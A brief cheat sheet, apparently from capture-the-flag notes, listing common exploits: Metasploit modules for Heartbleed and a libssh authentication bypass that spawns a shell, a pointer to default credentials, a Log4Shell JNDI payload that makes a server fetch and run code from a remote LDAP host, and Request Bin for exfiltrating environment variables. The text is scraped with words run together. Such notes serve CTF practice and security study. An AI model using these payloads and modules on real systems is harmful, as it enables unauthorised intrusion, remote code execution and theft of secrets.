Common Exploits
HeartbleedMetasploit module:
auxiliary/scanner/ssl/openssl_heartbleedBe sure to use
set VERBOSE trueto see the retrieved results. This can often contain a flag or some valuable information.libssh - SSHlibssh0.8.1(or others??) is vulnerable to an easy and immediate login. Metasploit module:auxiliary/scanner/ssh/libssh_auth_bypass. Be sure toset spawn_pty trueto actually receive a shell! Thensessions -i 1to interact with the shell spawned (or whatever appropriate ID)Default credentials- CheatSheetUnconfigured system can use the default credentials to login.
Log4ShellExploit on the Java library Log4j. Malicious code is fetched and executed from a remote JNDI server. A payload looks like
${jndi:ldap://example.com:1389/a}and need to be parsed by Log4j.Request Bin Useful for detection and environment variable exfiltration.